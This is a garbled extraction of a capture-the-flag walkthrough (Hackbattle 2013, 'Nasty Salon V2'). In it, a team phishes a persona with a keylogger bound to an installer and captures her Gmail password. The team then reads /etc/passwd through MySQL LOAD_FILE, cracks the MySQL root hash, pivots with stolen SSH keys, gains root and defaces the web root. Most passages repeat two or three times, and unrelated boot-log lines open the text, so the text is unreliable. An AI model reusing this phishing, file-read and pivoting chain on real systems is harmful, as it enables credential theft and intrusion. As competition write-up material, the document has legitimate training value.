Cloud-init v. 0.7.3 running 'modules:config' at Mon, 10 Mar 2014 15:17:54 +0000. Up 262.78 seconds.

* Starting AppArmor profiles [80G Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd

Page 40: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

So we finish our keylogger in 2 versionssimfatic forms , 2 versions btw and we upload them to our spa site and send the mail to Joan: immediately she installed it logs started coming in to our harvester and we got good things:

http://spa.oo3.co/soft/Simfatic

http://spa.oo3.co/soft/simfatic

The Version of the software we bound was meant to give an error message to give leeway incase of a problem to talk to her and send a second keylogger usindifferent method of logging in order to make it successful incase the first fails.

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

in 2 versions and use easy binder to bind them to simfatic forms , 2 versions btw and we upload them to our spa site and send the

immediately she installed it logs started coming in to our harvester and we got

http://spa.oo3.co/soft/Simfatic-setup-4.exe

/soft/simfatic-setup-2.exe

The Version of the software we bound was meant to give an error message to give leeway incase of a problem to talk to her and send a second keylogger usindifferent method of logging in order to make it successful incase the first fails.

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

and use easy binder to bind them to simfatic forms , 2 versions btw and we upload them to our spa site and send the

immediately she installed it logs started coming in to our harvester and we got

The Version of the software we bound was meant to give an error message to give leeway incase of a problem to talk to her and send a second keylogger using a different method of logging in order to make it successful incase the first fails.

Page 41: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

But the keylogger never failed us so here we are: Confirmed XP was right.

So we got this password as she typed her Tuesday, March 18, 2014 [12:23

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

But the keylogger never failed us so here we are: Confirmed XP was right.

So we got this password as she typed her Gmail password : Tuesday, March 18, 2014 [12:23 PM] thunderbird.exe: Mail Server Password Required

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

But the keylogger never failed us so here we are: Confirmed XP was right.

PM] thunderbird.exe: Mail Server Password Required

Page 42: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

n@stys4l0nw3b

Time to login to the Gmail and see how much we can get I think the speak for us here:

So phpMyAdmin Points to a db on .195.

SSH keypair to login to the server

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

and see how much we can get I think the pictures

So phpMyAdmin Points to a db on .195.

SSH keypair to login to the server

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

pictures will

Page 43: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Database Credentials

Munir Njiru || Ruth Efrain || Ibrahim GathunguMunir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

Page 44: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

Successful Login

In here we found passwords to both emails in the emails database but we were checking stuff out still before just using our keypair. So we created a database 0wnErz:

We made a table redteam with 2 columns id and data. We filled them with dummy data then on update we pulled files.

UPDATE redteam SET Data=LOAD_FILE('/etc/hosts)

WHERE id=3;

UPDATE redteam SET Data=LOAD_FILE('/etc/passwd)

WHERE id=4;

Page 45: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

For lulz while at it we cracked the mysql root hash weak password policy on their end root@localhost: 7561F5295A1A35CB8E0A7C46921994D383947FA5 MySQL4.1+: sha1(sha1_bin()) r00t

The race to the finish line began here

So our downloaded keypair from the mail we logged in to the db server.

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

For lulz while at it we cracked the mysql root hash , Despite the firewall this was a weak password policy on their end:

root@localhost: 7561F5295A1A35CB8E0A7C46921994D383947FA5 MySQL4.1+: sha1(sha1_bin())

to the finish line began here . This happened very fast ☺

from the mail we logged in to the db server.

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

Despite the firewall this was a

root@localhost: 7561F5295A1A35CB8E0A7C46921994D383947FA5 MySQL4.1+: sha1(sha1_bin())

from the mail we logged in to the db server.

Page 46: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim GathunguMunir Njiru || Ruth Efrain || Ibrahim GathunguMunir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

Page 47: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Then we became super user:

Then we read the history file and more secrets :

cat .bash_history

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Then we became super user:

Then we read the history file and more secrets :

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

Page 48: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

So there’s another keypair but to the .2 server i.e. webserverphpinfo? SSH is on port 49800key and yes it’s just that into the webserver

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

another keypair but to the .2 server i.e. webserver, remember from on port 49800, on checking files in the ubuntu home directory the just that into the webserver.

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

ember from on checking files in the ubuntu home directory the

Page 49: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Again get Root

Well we’d say we are done but we needed to share our joy so on to /var/www and like any movie give credits to the actors :D

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Well we’d say we are done but we needed to share our joy so on to /var/www and like any movie give credits to the actors :D

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

Well we’d say we are done but we needed to share our joy so on to /var/www and

Page 50: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

We’d like to thank Gichuki Jonia (./chuks) for the challenge we learnt a lot while doing it and Azanuru for the infrastructure . Made all this possible

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

to thank Gichuki Jonia (./chuks) for the challenge we learnt a lot while doing it and Azanuru for the infrastructure . Made all this possible ☺ .

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

to thank Gichuki Jonia (./chuks) for the challenge we learnt a lot while .